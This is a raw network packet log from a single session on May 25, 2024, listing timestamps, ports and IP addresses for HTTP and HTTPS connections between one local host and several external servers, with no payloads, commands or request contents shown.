May 25, 2024 21:29:36.045455933 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.051759005 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.051793098 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.051846027 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.051850080 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.051882029 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.051914930 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.051944017 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.052175045 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.052208900 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.052241087 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.052242994 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.052299023 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.052843094 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.052876949 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.052907944 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.052939892 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.052941084 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.052988052 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.053574085 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.053606987 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.053639889 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.053661108 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.054291964 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.054325104 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.054347992 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.054357052 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.054415941 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.055052042 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.055084944 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.055116892 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.055140018 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.055150032 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.055197001 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.055888891 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.055922031 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.055954933 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.055970907 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.056617022 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.056649923 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.056663990 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.056683064 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.056730986 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.057359934 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.057393074 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.057425022 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.057442904 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.057456970 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.057504892 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.058109045 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.058141947 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.058173895 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.058190107 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.058902025 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.058934927 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.058949947 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.058967113 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.059015989 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.059633970 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.059667110 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.059699059 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.059720993 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.059757948 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.059803009 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.107707977 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.107880116 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.113132954 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.309485912 CEST	49745	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:36.317115068 CEST	80	49745	158.160.165.129	192.168.2.4
May 25, 2024 21:29:36.317305088 CEST	49745	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:36.317305088 CEST	49745	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:36.317392111 CEST	49745	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:36.375083923 CEST	80	49745	158.160.165.129	192.168.2.4
May 25, 2024 21:29:36.423319101 CEST	80	49745	158.160.165.129	192.168.2.4
May 25, 2024 21:29:36.997476101 CEST	49746	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:36.997565985 CEST	443	49746	188.114.96.3	192.168.2.4
May 25, 2024 21:29:36.997668028 CEST	49746	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:37.032540083 CEST	49746	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:37.032582045 CEST	443	49746	188.114.96.3	192.168.2.4
May 25, 2024 21:29:37.062428951 CEST	80	49745	158.160.165.129	192.168.2.4
May 25, 2024 21:29:37.062690020 CEST	49745	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:37.067254066 CEST	80	49745	158.160.165.129	192.168.2.4
May 25, 2024 21:29:37.067579985 CEST	49745	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:37.077055931 CEST	80	49745	158.160.165.129	192.168.2.4
May 25, 2024 21:29:37.080501080 CEST	49747	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:37.085668087 CEST	80	49747	158.160.165.129	192.168.2.4
May 25, 2024 21:29:37.085741043 CEST	49747	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:37.086112976 CEST	49747	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:37.086112976 CEST	49747	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:37.137626886 CEST	80	49747	158.160.165.129	192.168.2.4
May 25, 2024 21:29:37.183640957 CEST	80	49747	158.160.165.129	192.168.2.4
May 25, 2024 21:29:37.556406975 CEST	443	49746	188.114.96.3	192.168.2.4
May 25, 2024 21:29:37.556571960 CEST	49746	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:37.620254993 CEST	49746	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:37.620336056 CEST	443	49746	188.114.96.3	192.168.2.4
May 25, 2024 21:29:37.621388912 CEST	443	49746	188.114.96.3	192.168.2.4
May 25, 2024 21:29:37.621485949 CEST	49746	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:37.625792027 CEST	49746	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:37.670496941 CEST	443	49746	188.114.96.3	192.168.2.4
May 25, 2024 21:29:37.940068007 CEST	80	49747	158.160.165.129	192.168.2.4
May 25, 2024 21:29:37.940349102 CEST	49747	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:37.943708897 CEST	49748	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:37.945231915 CEST	80	49747	158.160.165.129	192.168.2.4
May 25, 2024 21:29:37.945311069 CEST	49747	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:37.985915899 CEST	80	49747	158.160.165.129	192.168.2.4
May 25, 2024 21:29:37.991080046 CEST	443	49746	188.114.96.3	192.168.2.4
May 25, 2024 21:29:37.991183043 CEST	49746	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:37.991210938 CEST	443	49746	188.114.96.3	192.168.2.4
May 25, 2024 21:29:37.991260052 CEST	49746	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:37.991266012 CEST	443	49746	188.114.96.3	192.168.2.4
May 25, 2024 21:29:37.991312027 CEST	49746	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:37.991343021 CEST	443	49746	188.114.96.3	192.168.2.4
May 25, 2024 21:29:37.991398096 CEST	49746	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:37.995577097 CEST	80	49748	158.160.165.129	192.168.2.4
May 25, 2024 21:29:37.996871948 CEST	49748	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:37.997029066 CEST	49748	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:37.997049093 CEST	49748	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:38.000467062 CEST	49746	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:38.000497103 CEST	443	49746	188.114.96.3	192.168.2.4
May 25, 2024 21:29:38.059364080 CEST	80	49748	158.160.165.129	192.168.2.4
May 25, 2024 21:29:38.059393883 CEST	80	49748	158.160.165.129	192.168.2.4
May 25, 2024 21:29:38.724839926 CEST	80	49748	158.160.165.129	192.168.2.4
May 25, 2024 21:29:38.725064993 CEST	49748	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:38.729573011 CEST	80	49748	158.160.165.129	192.168.2.4
May 25, 2024 21:29:38.729639053 CEST	49748	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:38.730063915 CEST	49749	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:38.775295973 CEST	80	49748	158.160.165.129	192.168.2.4
May 25, 2024 21:29:38.780178070 CEST	80	49749	158.160.165.129	192.168.2.4
May 25, 2024 21:29:38.780256987 CEST	49749	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:38.780399084 CEST	49749	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:38.780457020 CEST	49749	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:38.838885069 CEST	80	49749	158.160.165.129	192.168.2.4
May 25, 2024 21:29:38.887372017 CEST	80	49749	158.160.165.129	192.168.2.4
May 25, 2024 21:29:39.499422073 CEST	80	49749	158.160.165.129	192.168.2.4
May 25, 2024 21:29:39.499583960 CEST	49749	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:39.504251003 CEST	80	49749	158.160.165.129	192.168.2.4
May 25, 2024 21:29:39.504308939 CEST	49749	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:39.525573969 CEST	49750	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:39.551332951 CEST	80	49749	158.160.165.129	192.168.2.4
May 25, 2024 21:29:39.561588049 CEST	80	49750	158.160.165.129	192.168.2.4
May 25, 2024 21:29:39.561676025 CEST	49750	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:39.561779976 CEST	49750	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:39.561814070 CEST	49750	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:39.617440939 CEST	80	49750	158.160.165.129	192.168.2.4
May 25, 2024 21:29:39.667491913 CEST	80	49750	158.160.165.129	192.168.2.4
May 25, 2024 21:29:40.211697102 CEST	49751	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:40.211776972 CEST	443	49751	188.114.96.3	192.168.2.4
May 25, 2024 21:29:40.211863041 CEST	49751	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:40.233418941 CEST	49751	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:40.233464003 CEST	443	49751	188.114.96.3	192.168.2.4
May 25, 2024 21:29:40.299617052 CEST	80	49750	158.160.165.129	192.168.2.4
May 25, 2024 21:29:40.299782038 CEST	49750	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:40.302124977 CEST	49752	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:40.307029009 CEST	80	49750	158.160.165.129	192.168.2.4
May 25, 2024 21:29:40.307087898 CEST	49750	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:40.311801910 CEST	80	49750	158.160.165.129	192.168.2.4
May 25, 2024 21:29:40.316540956 CEST	80	49752	158.160.165.129	192.168.2.4
May 25, 2024 21:29:40.316672087 CEST	49752	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:40.316894054 CEST	49752	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:40.316912889 CEST	49752	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:40.371907949 CEST	80	49752	158.160.165.129	192.168.2.4
May 25, 2024 21:29:40.419466972 CEST	80	49752	158.160.165.129	192.168.2.4
May 25, 2024 21:29:40.712313890 CEST	443	49751	188.114.96.3	192.168.2.4
May 25, 2024 21:29:40.712414026 CEST	49751	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:40.715822935 CEST	49751	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:40.715850115 CEST	443	49751	188.114.96.3	192.168.2.4
May 25, 2024 21:29:40.716259956 CEST	443	49751	188.114.96.3	192.168.2.4
May 25, 2024 21:29:40.716841936 CEST	49751	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:40.718317032 CEST	49751	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:40.758569956 CEST	443	49751	188.114.96.3	192.168.2.4
May 25, 2024 21:29:41.079699039 CEST	80	49752	158.160.165.129	192.168.2.4
May 25, 2024 21:29:41.079853058 CEST	49752	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:41.082454920 CEST	49753	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:41.084417105 CEST	80	49752	158.160.165.129	192.168.2.4
May 25, 2024 21:29:41.084489107 CEST	49752	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:41.118769884 CEST	80	49752	158.160.165.129	192.168.2.4
May 25, 2024 21:29:41.124912977 CEST	443	49751	188.114.96.3	192.168.2.4
May 25, 2024 21:29:41.124990940 CEST	49751	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:41.125046968 CEST	443	49751	188.114.96.3	192.168.2.4
May 25, 2024 21:29:41.125140905 CEST	49751	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:41.125154972 CEST	443	49751	188.114.96.3	192.168.2.4
May 25, 2024 21:29:41.125184059 CEST	443	49751	188.114.96.3	192.168.2.4
May 25, 2024 21:29:41.125211000 CEST	49751	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:41.125237942 CEST	49751	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:41.125860929 CEST	49751	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:41.125888109 CEST	443	49751	188.114.96.3	192.168.2.4
May 25, 2024 21:29:41.129266977 CEST	80	49753	158.160.165.129	192.168.2.4
May 25, 2024 21:29:41.129352093 CEST	49753	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:41.129514933 CEST	49753	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:41.135246992 CEST	49753	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:41.147377968 CEST	80	49753	158.160.165.129	192.168.2.4
May 25, 2024 21:29:41.195383072 CEST	80	49753	158.160.165.129	192.168.2.4
May 25, 2024 21:29:41.199981928 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:41.204933882 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:41.205625057 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:41.205625057 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:41.261825085 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:41.771410942 CEST	49755	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:41.771485090 CEST	443	49755	188.114.96.3	192.168.2.4
May 25, 2024 21:29:41.771668911 CEST	49755	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:41.832470894 CEST	49755	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:41.832523108 CEST	443	49755	188.114.96.3	192.168.2.4
May 25, 2024 21:29:41.987983942 CEST	80	49753	158.160.165.129	192.168.2.4
May 25, 2024 21:29:41.988230944 CEST	49753	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:41.993622065 CEST	80	49753	158.160.165.129	192.168.2.4
May 25, 2024 21:29:41.996140957 CEST	49753	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:42.039418936 CEST	80	49753	158.160.165.129	192.168.2.4
May 25, 2024 21:29:42.339363098 CEST	443	49755	188.114.96.3	192.168.2.4
May 25, 2024 21:29:42.339467049 CEST	49755	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:42.343236923 CEST	49755	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:42.343264103 CEST	443	49755	188.114.96.3	192.168.2.4
May 25, 2024 21:29:42.343612909 CEST	443	49755	188.114.96.3	192.168.2.4
May 25, 2024 21:29:42.343689919 CEST	49755	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:42.346076012 CEST	49755	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:42.380868912 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.380953074 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.382752895 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.382827044 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.386524916 CEST	443	49755	188.114.96.3	192.168.2.4
May 25, 2024 21:29:42.387357950 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.387393951 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.387450933 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.387450933 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.398611069 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.398756027 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.417032003 CEST	49756	443	192.168.2.4	103.174.152.66
May 25, 2024 21:29:42.417052984 CEST	443	49756	103.174.152.66	192.168.2.4
May 25, 2024 21:29:42.417501926 CEST	49756	443	192.168.2.4	103.174.152.66
May 25, 2024 21:29:42.418019056 CEST	49756	443	192.168.2.4	103.174.152.66
May 25, 2024 21:29:42.418032885 CEST	443	49756	103.174.152.66	192.168.2.4
May 25, 2024 21:29:42.492794037 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.493232012 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.494750977 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.496552944 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.499389887 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.499423981 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.499455929 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.499484062 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.499484062 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.499706984 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.508579969 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.508614063 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.508866072 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.517853975 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.518054008 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.584701061 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.584956884 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.605323076 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.605520010 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.607003927 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.607254982 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.609743118 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.609982014 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.612411976 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.612576008 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.615168095 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.615231991 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.618228912 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.618263006 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.618325949 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.618325949 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.622812033 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.622843981 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.622903109 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.622903109 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.626631975 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.626832008 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.629026890 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.629064083 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.629113913 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.629113913 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.633965015 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.634002924 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.634061098 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.635767937 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.635802984 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.635857105 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.635857105 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.641345978 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.641479969 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.734344006 CEST	443	49755	188.114.96.3	192.168.2.4
May 25, 2024 21:29:42.734431028 CEST	49755	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:42.734453917 CEST	443	49755	188.114.96.3	192.168.2.4
May 25, 2024 21:29:42.734515905 CEST	49755	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:42.734524012 CEST	443	49755	188.114.96.3	192.168.2.4
May 25, 2024 21:29:42.734633923 CEST	443	49755	188.114.96.3	192.168.2.4
May 25, 2024 21:29:42.734694004 CEST	49755	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:42.735953093 CEST	49755	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:42.735966921 CEST	443	49755	188.114.96.3	192.168.2.4
May 25, 2024 21:29:42.736258984 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.736488104 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.738435984 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.740400076 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.740639925 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.740814924 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.742892981 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.742938042 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.742957115 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.743005037 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.743031979 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.743103027 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.748416901 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.748450041 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.748513937 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.821594000 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.822650909 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.822724104 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.824124098 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.824798107 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.825620890 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.827627897 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.827687025 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.827730894 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.828022957 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.829253912 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.830579996 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.830688953 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.832173109 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.832247972 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.832304001 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.832612038 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.835208893 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.835246086 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.835278988 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.835299015 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.835354090 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.837644100 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.837801933 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.838602066 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.838637114 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.839088917 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.841111898 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.841201067 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.841257095 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.843606949 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.843767881 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.843801975 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.843825102 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.843831062 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.843889952 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.843889952 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.844705105 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.845135927 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.845854998 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.846214056 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.846673965 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.848372936 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.848565102 CEST	80	49754	189.163.126.89	192.168.2.4
